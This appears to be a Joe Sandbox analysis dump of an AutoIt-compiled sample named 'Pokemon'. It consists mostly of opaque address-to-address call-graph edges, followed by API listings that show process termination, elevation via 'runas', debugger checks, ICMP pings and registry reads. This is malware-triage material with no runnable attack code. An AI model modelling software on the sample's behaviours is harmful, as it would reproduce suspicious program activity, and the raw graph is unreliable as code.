103217->103482 103489 11a5b2 103217->103489 103495 119ffc 103217->103495 103498 110fb8 103217->103498 103523 af950 103217->103523 103530 98bda 103217->103530 103605 11ad47 103217->103605 103218 a2f2d 103218->103123 103219->103218 103646 ae322 8 API calls messages 103219->103646 103235 ae959 103234->103235 103236 ae928 103234->103236 103235->103123 103236->103235 103237 ae94c IsDialogMessageW 103236->103237 103238 eeff6 GetClassLongW 103236->103238 103237->103235 103237->103236 103238->103236 103238->103237 103258 a0376 messages 103239->103258 103240 b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 103240->103258 103241 b0413 29 API calls pre_c_initialization 103241->103258 103242 e632b 104297 103fe1 81 API calls __wsopen_s 103242->104297 103244 a1695 103250 9bed9 8 API calls 103244->103250 103256 a049d messages 103244->103256 103245 b014b 8 API calls 103245->103258 103246 a0aae messages 104295 103fe1 81 API calls __wsopen_s 103246->104295 103248 e5cdb 103255 9bed9 8 API calls 103248->103255 103248->103256 103249 e625a 104296 103fe1 81 API calls __wsopen_s 103249->104296 103250->103256 103253 9bed9 8 API calls 103253->103258 103255->103256 103256->103123 103257 9bf73 8 API calls 103257->103258 103258->103240 103258->103241 103258->103242 103258->103244 103258->103245 103258->103246 103258->103248 103258->103249 103258->103253 103258->103256 103258->103257 103259 e6115 103258->103259 103260 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 103258->103260 104222 a1990 103258->104222 104284 a1e50 103258->104284 104294 103fe1 81 API calls __wsopen_s 103259->104294 103260->103258 103262->103123 103263->103123 103264->103123 103265->103123 103266->103128 103267->103128 103268->103128 104318 fe80e 103269->104318 103271 fde86 CloseHandle 103271->103128 103272 fddd4 Process32NextW 103272->103271 103277 fddcd 103272->103277 103273 9bf73 8 API calls 103273->103277 103274 9b329 
8 API calls 103274->103277 103275 9568e 8 API calls 103275->103277 103276 97bb5 8 API calls 103276->103277 103277->103271 103277->103272 103277->103273 103277->103274 103277->103275 103277->103276 104324 ae36b 41 API calls 103277->104324 103280 a0340 224 API calls 103279->103280 103298 9e99d 103280->103298 103281 e31d3 103343 103fe1 81 API calls __wsopen_s 103281->103343 103283 9ea0b messages 103283->103144 103284 9eac3 103286 9edd5 103284->103286 103287 9eace 103284->103287 103285 9ecff 103289 e31c4 103285->103289 103290 9ed14 103285->103290 103286->103283 103292 b017b 8 API calls 103286->103292 103320 b014b 103287->103320 103342 116162 8 API calls 103289->103342 103294 b014b 8 API calls 103290->103294 103291 9ebb8 103329 b017b 103291->103329 103300 9ead5 __fread_nolock 103292->103300 103303 9eb6a 103294->103303 103295 b014b 8 API calls 103295->103298 103297 b014b 8 API calls 103299 9eaf6 103297->103299 103298->103281 103298->103283 103298->103284 103298->103286 103298->103291 103298->103295 103306 9eb29 __fread_nolock messages 103298->103306 103299->103306 103312 9d260 103299->103312 103300->103297 103300->103299 103302 e31b3 103341 103fe1 81 API calls __wsopen_s 103302->103341 103303->103144 103306->103285 103306->103302 103306->103303 103307 e318e 103306->103307 103309 e316c 103306->103309 103338 944fe 224 API calls 103306->103338 103340 103fe1 81 API calls __wsopen_s 103307->103340 103339 103fe1 81 API calls __wsopen_s 103309->103339 103311->103145 103313 9d29a 103312->103313 103314 9d2c6 103312->103314 103315 9f6d0 224 API calls 103313->103315 103316 a0340 224 API calls 103314->103316 103318 9d2a0 103315->103318 103317 e184b 103316->103317 103317->103318 103344 103fe1 81 API calls __wsopen_s 103317->103344 103318->103306 103321 b0150 ___std_exception_copy 103320->103321 103322 b016a 103321->103322 103325 b016c 103321->103325 103345 b521d 7 API calls 2 library calls 103321->103345 103322->103300 103324 b09dd 103347 b3614 RaiseException 103324->103347 
103325->103324 103346 b3614 RaiseException 103325->103346 103328 b09fa 103328->103300 103331 b014b ___std_exception_copy 103329->103331 103330 b016a 103330->103306 103331->103330 103334 b016c 103331->103334 103348 b521d 7 API calls 2 library calls 103331->103348 103333 b09dd 103350 b3614 RaiseException 103333->103350 103334->103333 103349 b3614 RaiseException 103334->103349 103337 b09fa 103337->103306 103338->103306 103339->103303 103340->103303 103341->103303 103342->103281 103343->103283 103344->103318 103345->103321 103346->103324 103347->103328 103348->103331 103349->103333 103350->103337 103352 9befc __fread_nolock 103351->103352 103353 9beed 103351->103353 103352->103164 103353->103352 103354 b017b 8 API calls 103353->103354 103354->103352 103356 9be38 103355->103356 103357 9be67 103356->103357 103373 9bfa5 103356->103373 103357->103164 103359->103164 103360->103150 103362 b017b 8 API calls 103361->103362 103363 9bf88 103362->103363 103364 b014b 8 API calls 103363->103364 103365 9bf96 103364->103365 103366 b0413 29 API calls __onexit 103365->103366 103366->103158 103367->103164 103368->103164 103369->103164 103370->103164 103371->103164 103372->103164 103390 9cf80 103373->103390 103375 9bfb5 103376 e0db6 103375->103376 103377 9bfc3 103375->103377 103399 9b4c8 8 API calls 103376->103399 103379 b014b 8 API calls 103377->103379 103380 9bfd4 103379->103380 103382 9bf73 8 API calls 103380->103382 103381 e0dc1 103383 9bfde 103382->103383 103384 9bfed 103383->103384 103385 9bed9 8 API calls 103383->103385 103386 b014b 8 API calls 103384->103386 103385->103384 103387 9bff7 103386->103387 103398 9be7b 39 API calls 103387->103398 103389 9c01b 103389->103357 103391 9d1c7 103390->103391 103396 9cf93 103390->103396 103391->103375 103393 9bf73 8 API calls 103393->103396 103394 9d03d 103394->103375 103396->103393 103396->103394 103400 b05b2 5 API calls __Init_thread_wait 103396->103400 103401 b0413 29 API calls __onexit 103396->103401 103402 b0568 EnterCriticalSection 
LeaveCriticalSection SetEvent ResetEvent 103396->103402 103398->103389 103399->103381 103400->103396 103401->103396 103402->103396 103404 a31a1 103403->103404 103406 a317d 103403->103406 103663 b05b2 5 API calls __Init_thread_wait 103404->103663 103405 a2bb0 103405->103180 103406->103405 103665 b05b2 5 API calls __Init_thread_wait 103406->103665 103408 a31ab 103408->103406 103664 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103408->103664 103410 a9f47 103410->103405 103666 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 103410->103666 103667 98ec0 103413->103667 103417 aac7f 103428 ab09b _wcslen 103417->103428 103709 9c98d 103417->103709 103421 abbbe 43 API calls 103421->103428 103424 96c03 8 API calls 103424->103428 103425 9c98d 39 API calls 103425->103428 103426 ab1fb 103426->103217 103427 98ec0 52 API calls 103427->103428 103428->103421 103428->103424 103428->103425 103428->103426 103428->103427 103695 9396b 103428->103695 103705 93907 103428->103705 103714 b4d98 103428->103714 103724 97ad5 103428->103724 103729 9ad40 8 API calls __fread_nolock 103428->103729 103730 97b1a 8 API calls 103428->103730 103731 98577 103428->103731 103433 11aa08 103432->103433 103439 11a9c8 103432->103439 103434 11aa26 103433->103434 103436 9c98d 39 API calls 103433->103436 103435 9c98d 39 API calls 103434->103435 103437 11aa8e 103434->103437 103434->103439 103435->103437 103436->103434 103843 100372 103437->103843 103439->103217 103441 98ec0 52 API calls 103440->103441 103442 11ab62 103441->103442 103443 fdd87 46 API calls 103442->103443 103444 11ab73 103443->103444 103445 11abc3 OpenProcess 103444->103445 103451 11ab78 103444->103451 103446 11acc2 TerminateProcess 103445->103446 103447 11abdd GetLastError 103445->103447 103448 11ad20 CloseHandle 103446->103448 103449 11accf GetLastError 103446->103449 103450 11abec 103447->103450 103459 11ac72 103447->103459 103448->103451 103457 11ace3 103449->103457 103901 fd715 12 API calls 
103450->103901 103451->103217 103453 11abfa 103902 f2010 11 API calls messages 103453->103902 103455 11ac04 103456 11ac08 OpenProcess 103455->103456 103458 11ac1a 103455->103458 103456->103458 103457->103448 103903 f1a0b AdjustTokenPrivileges CloseHandle messages 103458->103903 103459->103446 103459->103451 103461 11ac70 103461->103459 103463 b017b 8 API calls 103462->103463 103464 10f95b 103463->103464 103904 9423c 103464->103904 103467 98ec0 52 API calls 103468 10f97c GetEnvironmentVariableW 103467->103468 103907 10160f 8 API calls 103468->103907 103470 10f999 messages 103470->103217 103908 1189b6 103471->103908 103473 119ff8 103473->103217 103475 11a705 103474->103475 103476 11a6c5 103474->103476 103478 9c98d 39 API calls 103475->103478 103479 11a723 103475->103479 103476->103217 103477 9c98d 39 API calls 103480 11a780 103477->103480 103478->103479 103479->103476 103479->103477 103479->103480 103481 100372 58 API calls 103480->103481 103481->103476 103483 98ec0 52 API calls 103482->103483 103484 106662 103483->103484 104034 fdc54 103484->104034 103486 10666a 103487 10666e GetLastError 103486->103487 103488 106683 103486->103488 103487->103488 103488->103217 103491 11a5c5 103489->103491 103490 98ec0 52 API calls 103492 11a632 103490->103492 103491->103490 103494 11a5d4 103491->103494 104128 1018a9 103492->104128 103494->103217 103496 1189b6 119 API calls 103495->103496 103497 11a00c 103496->103497 103497->103217 103499 110fe1 103498->103499 103500 11100f WSAStartup 103499->103500 103501 9c98d 39 API calls 103499->103501 103502 111054 103500->103502 103522 111023 messages 103500->103522 103503 110ffc 103501->103503 104169 ac1f6 103502->104169 103503->103500 103507 9c98d 39 API calls 103503->103507 103506 98ec0 52 API calls 103508 111069 103506->103508 103509 11100b 103507->103509 104174 af9d4 WideCharToMultiByte 103508->104174 103509->103500 103511 111075 inet_addr gethostbyname 103512 111093 IcmpCreateFile 103511->103512 103511->103522 103513 1110d3 
103512->103513 103512->103522 103514 b017b 8 API calls 103513->103514 103515 1110ec 103514->103515 103516 9423c 8 API calls 103515->103516 103517 1110f7 103516->103517 103518 111102 IcmpSendEcho 103517->103518 103519 11112b IcmpSendEcho 103517->103519 103520 11114c 103518->103520 103519->103520 103521 111212 IcmpCloseHandle WSACleanup 103520->103521 103521->103522 103522->103217 103524 9c98d 39 API calls 103523->103524 103525 af964 103524->103525 103526 af96c timeGetTime 103525->103526 103527 efb20 Sleep 103525->103527 103528 9c98d 39 API calls 103526->103528 103529 af982 103528->103529 103529->103217 103531 98ec0 52 API calls 103530->103531 103532 98bf9 103531->103532 103533 98ec0 52 API calls 103532->103533 103534 98c0e 103533->103534 103535 98ec0 52 API calls 103534->103535 103536 98c21 103535->103536 103537 98ec0 52 API calls 103536->103537 103538 98c37 103537->103538 103539 97ad5 8 API calls 103538->103539 103540 98c4b 103539->103540 103541 d6767 103540->103541 103542 9c98d 39 API calls 103540->103542 103544 97e12 8 API calls 103541->103544 103543 98c72 103542->103543 103543->103541 103568 98c98 try_get_first_available_module 103543->103568 103545 d6786 103544->103545 103546 98470 8 API calls 103545->103546 103547 d6798 103546->103547 103550 98a60 8 API calls 103547->103550 103578 d67bd 103547->103578 103548 97e12 8 API calls 103551 98d4e 103548->103551 103549 98ec0 52 API calls 103553 98d27 103549->103553 103550->103578 103554 98d5c 103551->103554 103555 d6873 103551->103555 103552 98d3c 103552->103548 103559 98ec0 52 API calls 103553->103559 103560 d696e 103554->103560 103561 98d71 103554->103561 103557 d687d 103555->103557 103558 d68bc 103555->103558 103564 98470 8 API calls 103557->103564 103565 98470 8 API calls 103558->103565 103559->103552 103563 98470 8 API calls 103560->103563 103566 98470 8 API calls 103561->103566 103562 9893c 8 API calls 103562->103578 103569 d697b 103563->103569 103570 d6885 103564->103570 103571 d68c5 103565->103571 103567 98d79 
103566->103567 103573 9bd57 8 API calls 103567->103573 103568->103549 103568->103552 103600 98d91 try_get_first_available_module 103568->103600 103575 98a60 8 API calls 103569->103575 103576 98ec0 52 API calls 103570->103576 103572 98a60 8 API calls 103571->103572 103577 d68e1 103572->103577 103573->103600 103574 98a60 8 API calls 103574->103578 103575->103600 103579 d6897 103576->103579 103583 98ec0 52 API calls 103577->103583 103578->103562 103578->103574 103603 98e71 103578->103603 104199 98844 8 API calls __fread_nolock 103578->104199 104200 98844 8 API calls __fread_nolock 103579->104200 103581 d68ab 103584 9893c 8 API calls 103581->103584 103586 d68fc 103583->103586 103587 d68b9 103584->103587 103585 9893c 8 API calls 103585->103600 104201 98844 8 API calls __fread_nolock 103586->104201 103595 98a60 8 API calls 103587->103595 103589 d69c1 103590 d69f1 103589->103590 103591 d69e5 103589->103591 104184 9893c 103590->104184 104202 9ad40 8 API calls __fread_nolock 103591->104202 103594 d6910 103598 9893c 8 API calls 103594->103598 103595->103603 103598->103587 103599 d69ef 103600->103585 103600->103589 103600->103603 104187 98844 8 API calls __fread_nolock 103600->104187 104188 98a60 103600->104188 103601 98a60 8 API calls 103602 d6a12 103601->103602 103604 9bd57 8 API calls 103602->103604 103603->103217 103604->103599 103606 98ec0 52 API calls 103605->103606 103607 11ad63 103606->103607 103608 fdd87 46 API calls 103607->103608 103609 11ad72 103608->103609 103609->103217 103611 117b52 103610->103611 103612 117b38 103610->103612 104205 1160e6 103611->104205 104216 103fe1 81 API calls __wsopen_s 103612->104216 103616 a0340 223 API calls 103617 117bc1 103616->103617 103618 117c5c 103617->103618 103621 117c03 103617->103621 103641 117b4a 103617->103641 103619 117cb0 103618->103619 103620 117c62 103618->103620 103622 98ec0 52 API calls 103619->103622 103619->103641 104217 101ad8 8 API calls 103620->104217 103626 10148b 8 API calls 103621->103626 103624 117cc2 
103622->103624 103627 9c2c9 8 API calls 103624->103627 103625 117c85 104218 9bd07 8 API calls 103625->104218 103629 117c3b 103626->103629 103630 117ce6 CharUpperBuffW 103627->103630 103631 a2b20 223 API calls 103629->103631 103632 117d00 103630->103632 103631->103641 103633 117d53 103632->103633 103634 117d07 103632->103634 103635 98ec0 52 API calls 103633->103635 104212 10148b 103634->104212 103636 117d5b 103635->103636 104219 aaa65 9 API calls 103636->104219 103640 a2b20 223 API calls 103640->103641 103641->103181 103642 117d65 103642->103641 103643 98ec0 52 API calls 103642->103643 103644 117d80 103643->103644 104220 9bd07 8 API calls 103644->104220 103646->103219 103647->103176 103649 9b338 _wcslen 103648->103649 103650 b017b 8 API calls 103649->103650 103651 9b360 __fread_nolock 103650->103651 103652 b014b 8 API calls 103651->103652 103653 9b376 103652->103653 103653->103191 103654->103186 103655->103190 103656->103202 103657->103202 103658->103214 103659->103214 103660->103214 103661->103212 103662->103214 103663->103408 103664->103406 103665->103410 103666->103405 103668 98ed5 103667->103668 103684 98ed2 103667->103684 103669 98f0b 103668->103669 103670 98edd 103668->103670 103672 d6b1f 103669->103672 103675 98f1d 103669->103675 103676 d6a38 103669->103676 103743 b5536 26 API calls 103670->103743 103746 b54f3 26 API calls 103672->103746 103673 98eed 103680 b014b 8 API calls 103673->103680 103744 afe6f 51 API calls 103675->103744 103683 b017b 8 API calls 103676->103683 103689 d6ab1 103676->103689 103677 d6b37 103677->103677 103681 98ef7 103680->103681 103682 9b329 8 API calls 103681->103682 103682->103684 103685 d6a81 103683->103685 103690 abc58 103684->103690 103686 b014b 8 API calls 103685->103686 103687 d6aa8 103686->103687 103688 9b329 8 API calls 103687->103688 103688->103689 103745 afe6f 51 API calls 103689->103745 103691 b014b 8 API calls 103690->103691 103692 abc65 103691->103692 103693 9b329 8 API calls 103692->103693 103694 abc70 103693->103694 
104823 103fe1 81 API calls __wsopen_s 104803->104823 104807->104801 104808->104801 104810->104801 104811->104801 104812->104801 104813->104801 104814->104801 104815->104801 104816->104801 104817->104788 104818->104803 104819->104801 104820->104801 104821->104801 104822->104803 104823->104791 105980 a0ebf 105981 a0ed3 105980->105981 105987 a1425 105980->105987 105982 a0ee5 105981->105982 105983 b014b 8 API calls 105981->105983 105984 e562c 105982->105984 105986 a0f3e 105982->105986 106013 9b4c8 8 API calls 105982->106013 105983->105982 106014 101b14 8 API calls 105984->106014 105989 a2b20 224 API calls 105986->105989 106005 a049d messages 105986->106005 105987->105982 105990 9bed9 8 API calls 105987->105990 106011 a0376 messages 105989->106011 105990->105982 105991 e632b 106018 103fe1 81 API calls __wsopen_s 105991->106018 105992 a1e50 40 API calls 105992->106011 105993 a1695 105998 9bed9 8 API calls 105993->105998 105993->106005 105994 b014b 8 API calls 105994->106011 105996 e5cdb 106002 9bed9 8 API calls 105996->106002 105996->106005 105997 e625a 106017 103fe1 81 API calls __wsopen_s 105997->106017 105998->106005 106001 a1990 224 API calls 106001->106011 106002->106005 106003 9bed9 8 API calls 106003->106011 106004 9bf73 8 API calls 106004->106011 106006 b0413 29 API calls pre_c_initialization 106006->106011 106007 b05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 106007->106011 106008 e6115 106015 103fe1 81 API calls __wsopen_s 106008->106015 106010 a0aae messages 106016 103fe1 81 API calls __wsopen_s 106010->106016 106011->105991 106011->105992 106011->105993 106011->105994 106011->105996 106011->105997 106011->106001 106011->106003 106011->106004 106011->106005 106011->106006 106011->106007 106011->106008 106011->106010 106012 b0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 106011->106012 106012->106011 106013->105982 106014->106005 106015->106010 
106016->106005 106017->106005 106018->106005 104824 a235c 104825 a2365 __fread_nolock 104824->104825 104826 98ec0 52 API calls 104825->104826 104827 e74e3 104825->104827 104830 a23b6 104825->104830 104832 b014b 8 API calls 104825->104832 104834 a1ff7 __fread_nolock 104825->104834 104835 b017b 8 API calls 104825->104835 104826->104825 104836 f13c8 8 API calls __fread_nolock 104827->104836 104829 e74ef 104833 9bed9 8 API calls 104829->104833 104829->104834 104831 97d74 8 API calls 104830->104831 104831->104834 104832->104825 104833->104834 104835->104825 104836->104829 106019 c947a 106020 c9487 106019->106020 106024 c949f 106019->106024 106069 bf649 20 API calls __dosmaperr 106020->106069 106022 c948c 106070 c2b5c 26 API calls pre_c_initialization 106022->106070 106025 c9497 106024->106025 106026 c94fa 106024->106026 106071 d0144 21 API calls 2 library calls 106024->106071 106028 bdcc5 __fread_nolock 26 API calls 106026->106028 106029 c9512 106028->106029 106039 c8fb2 106029->106039 106031 c9519 106031->106025 106032 bdcc5 __fread_nolock 26 API calls 106031->106032 106033 c9545 106032->106033 106033->106025 106034 bdcc5 __fread_nolock 26 API calls 106033->106034 106035 c9553 106034->106035 106035->106025 106036 bdcc5 __fread_nolock 26 API calls 106035->106036 106037 c9563 106036->106037 106038 bdcc5 __fread_nolock 26 API calls 106037->106038 106038->106025 106040 c8fbe CallCatchBlock 106039->106040 106041 c8fde 106040->106041 106042 c8fc6 106040->106042 106044 c90a4 106041->106044 106049 c9017 106041->106049 106073 bf636 20 API calls __dosmaperr 106042->106073 106080 bf636 20 API calls __dosmaperr 106044->106080 106045 c8fcb 106074 bf649 20 API calls __dosmaperr 106045->106074 106047 c90a9 106081 bf649 20 API calls __dosmaperr 106047->106081 106051 c903b 106049->106051 106052 c9026 106049->106052 106072 c54ba EnterCriticalSection 106051->106072 106075 bf636 20 API calls __dosmaperr 106052->106075 106054 c9033 106082 c2b5c 26 API calls pre_c_initialization 
106054->106082 106056 c9041 106058 c905d 106056->106058 106059 c9072 106056->106059 106057 c902b 106076 bf649 20 API calls __dosmaperr 106057->106076 106077 bf649 20 API calls __dosmaperr 106058->106077 106064 c90c5 __fread_nolock 38 API calls 106059->106064 106061 c8fd3 __fread_nolock 106061->106031 106066 c906d 106064->106066 106065 c9062 106078 bf636 20 API calls __dosmaperr 106065->106078 106079 c909c LeaveCriticalSection __wsopen_s 106066->106079 106069->106022 106070->106025 106071->106026 106072->106056 106073->106045 106074->106061 106075->106057 106076->106054 106077->106065 106078->106066 106079->106061 106080->106047 106081->106054 106082->106061 106083 91033 106088 968b4 106083->106088 106087 91042 106089 9bf73 8 API calls 106088->106089 106090 96922 106089->106090 106096 9589f 106090->106096 106093 969bf 106094 91038 106093->106094 106099 96b14 8 API calls __fread_nolock 106093->106099 106095 b0413 29 API calls __onexit 106094->106095 106095->106087 106100 958cb 106096->106100 106099->106093 106101 958be 106100->106101 106102 958d8 106100->106102 106101->106093 106102->106101 106103 958df RegOpenKeyExW 106102->106103 106103->106101 106104 958f9 RegQueryValueExW 106103->106104 106105 9591a 106104->106105 106106 9592f RegCloseKey 106104->106106 106105->106106 106106->106101 104837 e6555 104838 b014b 8 API calls 104837->104838 104839 e655c 104838->104839 104840 e6575 __fread_nolock 104839->104840 104842 b017b 8 API calls 104839->104842 104841 b017b 8 API calls 104840->104841 104843 e659a 104841->104843 104842->104840 106107 936f5 106110 9370f 106107->106110 106111 93726 106110->106111 106112 9372b 106111->106112 106113 9378a 106111->106113 106154 93788 106111->106154 106114 93738 106112->106114 106115 93804 PostQuitMessage 106112->106115 106117 d3df4 106113->106117 106118 93790 106113->106118 106119 93743 106114->106119 106120 d3e61 106114->106120 106122 93709 106115->106122 106116 9376f DefWindowProcW 106116->106122 106165 92f92 10 API calls 
106117->106165 106123 937bc SetTimer RegisterWindowMessageW 106118->106123 106124 93797 106118->106124 106127 9374d 106119->106127 106128 9380e 106119->106128 106168 fc8f7 65 API calls ___scrt_fastfail 106120->106168 106123->106122 106129 937e5 CreatePopupMenu 106123->106129 106125 d3d95 106124->106125 106126 937a0 KillTimer 106124->106126 106138 d3d9a 106125->106138 106139 d3dd0 MoveWindow 106125->106139 106132 93907 Shell_NotifyIconW 106126->106132 106133 93758 106127->106133 106134 d3e46 106127->106134 106155 afcad 106128->106155 106129->106122 106131 d3e15 106166 af23c 40 API calls 106131->106166 106142 937b3 106132->106142 106143 93763 106133->106143 106144 937f2 106133->106144 106134->106116 106167 f1423 8 API calls 106134->106167 106135 d3e73 106135->106116 106135->106122 106140 d3dbf SetFocus 106138->106140 106141 d3da0 106138->106141 106139->106122 106140->106122 106141->106143 106145 d3da9 106141->106145 106162 959ff DeleteObject DestroyWindow 106142->106162 106143->106116 106151 93907 Shell_NotifyIconW 106143->106151 106163 9381f 75 API calls ___scrt_fastfail 106144->106163 106164 92f92 10 API calls 106145->106164 106150 93802 106150->106122 106152 d3e3a 106151->106152 106153 9396b 60 API calls 106152->106153 106153->106154 106154->106116 106156 afd4b 106155->106156 106157 afcc5 ___scrt_fastfail 106155->106157 106156->106122 106158 961a9 55 API calls 106157->106158 106160 afcec 106158->106160 106159 afd34 KillTimer SetTimer 106159->106156 106160->106159 106161 efe2b Shell_NotifyIconW 106160->106161 106161->106159 106162->106122 106163->106150 106164->106122 106165->106131 106166->106143 106167->106154 106168->106135 104844 e5650 104853 ae3d5 104844->104853 104846 e5666 104848 e56e1 104846->104848 104862 aaa65 9 API calls 104846->104862 104850 e61d7 104848->104850 104864 103fe1 81 API calls __wsopen_s 104848->104864 104851 e56c1 104851->104848 104863 10247e 8 API calls 104851->104863 104854 ae3e3 104853->104854 104855 ae3f6 104853->104855 104865 9b4c8 8 
API calls 104854->104865 104856 ae3fb 104855->104856 104857 ae429 104855->104857 104859 b014b 8 API calls 104856->104859 104866 9b4c8 8 API calls 104857->104866 104861 ae3ed 104859->104861 104861->104846 104862->104851 104863->104848 104864->104850 104865->104861 104866->104861

Control-flow Graph
APIs
• GetVersionExW.KERNEL32(?), ref: 00095FF7
  • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
• GetCurrentProcess.KERNEL32(?,0012DC2C,00000000,?,?), ref: 00096123
• IsWow64Process.KERNEL32(00000000,?,?), ref: 0009612A
• LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00096155
• GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00096167
• GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00096175
• FreeLibrary.KERNEL32(00000000,?,?), ref: 0009617C
• GetSystemInfo.KERNEL32(?,?,?), ref: 000961A1
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
• String ID: GetNativeSystemInfo$kernel32.dll$|O
• API String ID: 3290436268-3101561225
• Opcode ID: 92b23c28940da0f56cc62a6355eff7cf553ab8c47700db5ef61d0bbcbe18ce88
• Instruction ID: a90c8bc66cc2d057c700ac62386f7e0862ab3021b298f46cfce0ec86669b7963
• Opcode Fuzzy Hash: 92b23c28940da0f56cc62a6355eff7cf553ab8c47700db5ef61d0bbcbe18ce88
• Instruction Fuzzy Hash: 55A1832290ABC4DFCB21CB697C815A97FA47B3F301B084899D88197B62C7BD45C8DB31

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00093368,?), ref: 000933BB
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00093368,?), ref: 000933CE
• GetFullPathNameW.KERNEL32(00007FFF,?,?,00162418,00162400,?,?,?,?,?,?,00093368,?), ref: 0009343A
  • Part of subcall function 00098577: _wcslen.LIBCMT ref: 0009858A
  • Part of subcall function 0009425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00093462,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000942A0
• SetCurrentDirectoryW.KERNEL32(?,00000001,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000934BB
• MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 000D3CB0
• SetCurrentDirectoryW.KERNEL32(?,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000D3CF1
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001531F4,00162418,?,?,?,?,?,?,?,00093368), ref: 000D3D7A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 000D3D81
  • Part of subcall function 000934D3: GetSysColorBrush.USER32(0000000F), ref: 000934DE
  • Part of subcall function 000934D3: LoadCursorW.USER32(00000000,00007F00), ref: 000934ED
  • Part of subcall function 000934D3: LoadIconW.USER32(00000063), ref: 00093503
  • Part of subcall function 000934D3: LoadIconW.USER32(000000A4), ref: 00093515
  • Part of subcall function 000934D3: LoadIconW.USER32(000000A2), ref: 00093527
  • Part of subcall function 000934D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 0009353F
  • Part of subcall function 000934D3: RegisterClassExW.USER32(?), ref: 00093590
  • Part of subcall function 000935B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000935E1
  • Part of subcall function 000935B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00093602
  • Part of subcall function 000935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 00093616
  • Part of subcall function 000935B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00093368,?), ref: 0009361F
  • Part of subcall function 0009396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00093A3C
Strings
• It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 000D3CAA
                                                                                                                                                                                                                                                                                      • runas, xrefs: 000D3D75
                                                                                                                                                                                                                                                                                      • AutoIt, xrefs: 000D3CA5
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                      • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                      • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                      • Opcode ID: e6389c6e2cbbbfdcce9c425286314aa2c9e976a2e5804899aa8135f8ad2e5bd0
                                                                                                                                                                                                                                                                                      • Instruction ID: ce9bb9b5ff19d840620bfa080a43ad7f930d939343e40378ebf2906bad043869
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6389c6e2cbbbfdcce9c425286314aa2c9e976a2e5804899aa8135f8ad2e5bd0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE51F870108740AECF11EF60EC15DEE7BA8AF94744F00042DF592576A3DF749A8AEB62

                                                                                                                                                                                                                                                                                      Control-flow Graph

